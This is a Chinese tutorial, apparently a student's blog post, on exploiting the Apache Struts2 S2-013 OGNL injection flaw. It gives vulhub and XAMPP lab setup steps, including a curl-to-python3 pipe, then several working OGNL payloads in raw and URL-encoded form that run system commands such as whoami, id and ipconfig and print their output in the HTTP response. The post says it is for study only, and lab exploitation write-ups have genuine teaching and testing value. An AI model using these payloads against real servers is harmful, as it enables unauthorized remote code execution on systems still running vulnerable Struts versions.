Struts-S2-013漏洞利用（含环境搭建、含POC）

S2-013

此文仅供大家交流学习，严禁非法使用

一、参考网址：

https://github.com/phith0n/vulhub/tree/master/struts2/s2-013

二、 影响版本：

http://struts.apache.org/docs/s2-013.html

三、 漏洞介绍：

• 在Struts Blank应用程序中打开HelloWorld.jsp，并将以下参数添加到url / a标签之一：

includeParams="all"

• 这样一来，这条线将会是这样的：

id="url"
action="HelloWorld"
includeParams="all">

• （它也适用于includeParams =“get”）。

• 运行struts2-blank应用程序

• 打开url：http：// localhost：8080 / example / HelloWorld.action？fakeParam =％25％7B（％23_memberAccess％5B'allowStaticMethodAccess'％5D％3Dtrue）（％23context％5B'xwork.MethodAccessor.denyMethodExecution'％ 5D％3Dfalse）（％23writer％3D％40org.apache.struts2.ServletActionContext％40getResponse（）。getWriter（）％2C％23writer.println（'hacked'）％2C％23writer.close（））％7D
  （这是缩写版http://goo.gl/lhlTl）

• 你会注意到，在这种情况下，没有办法逃避/清理fakeParam，因为它不是一个预期的参数。

• Struts2 标签中 和 都包含一个 includeParams 属性，其值可设置为 none，get 或 all，参考官方其对应意义如下：

none - 链接不包含请求的任意参数值（默认）

get - 链接只包含 GET 请求中的参数和其值

all - 链接包含 GET 和 POST 所有参数和其值

用来显示一个超链接，当includeParams=all的时候，会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染，造成任意命令执行漏洞。

四、 环境搭建：

（windows）

环境搭建，类似与一下安装showcase，相同方法可以部署blank

• 下载/struts/2.1.6

下载地址：http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip

• 下载安装xampp

• 部署showcase

• 解压

2.1.6_1.png

2.1.6_2.png

• 复制到.

2.1.6_3.png

• 重启tomcat

2.1.6_4.png

• 已成功自动部署

2.1.6_5.png

• 修改配置

在Struts Blank应用程序中打开HelloWorld.jsp，并将以下参数添加到url / a标签之一：
includeParams="all"
这样一来，这条线将会是这样的：

运行struts2-blank应用程序

环境搭建：（ubuntu）

curl -s https://bootstrap.pypa.io/get-pip.py | python3

• 安装docker
  apt-get update && apt-get install docker.io

• 启动docker服务
  service docker start

• 安装compose
  pip install docker-compose

注意要先ssh连接，将公钥添加到github上，具体参照网上教程

• 拉取项目
  git clone [email protected]:phith0n/vulhub.git
  cd vulhub

• 进入某一个漏洞/环境的目录
  cd nginx_php5_mysql

• 自动化编译环境
  docker-compose build

• 启动整个环境
  docker-compose up -d

五、 POC:

${(#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec('whoami').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#out.println(#d),#out.close())}

// 或

${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}

六、 测试网址：

原始网址为：

http:// 127.0.0.1:8080/struts2-blank-2.1.6/example/HelloWorld.action

更改后网址为：

http://127.0.0.1:8080/struts2-blank-2.1.6/example/HelloWorld.action?url=%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%[email protected]@getResponse%28%29.getWriter%28%29%2C%23out.println%28%23d%29%2C%23out.close%28%29%29%7D

七、执行结果

1.png

八、 发现问题并修改

存在问题是：执行结果多行时可能无法输出多行（windows），歹后续更改POC

后续POC

%24%7B(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ipconfig",%[email protected]@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%[email protected]@getResponse(),%23out.getWriter().println(%23echo))%7D

弥补之前POC在windows中执行命令结果多行，但只显示第一行的问题，比如ipconfig
执行结果

2.png

注意，修改res大小来获取需要的结果的大小

九、 至此，该漏洞基本利用完毕

本人还是一个未毕业的小萌新，希望大家多多帮助，有问题请发送邮件到[email protected]不胜感激，我也会尽量去帮助大家

坚决做一名白帽子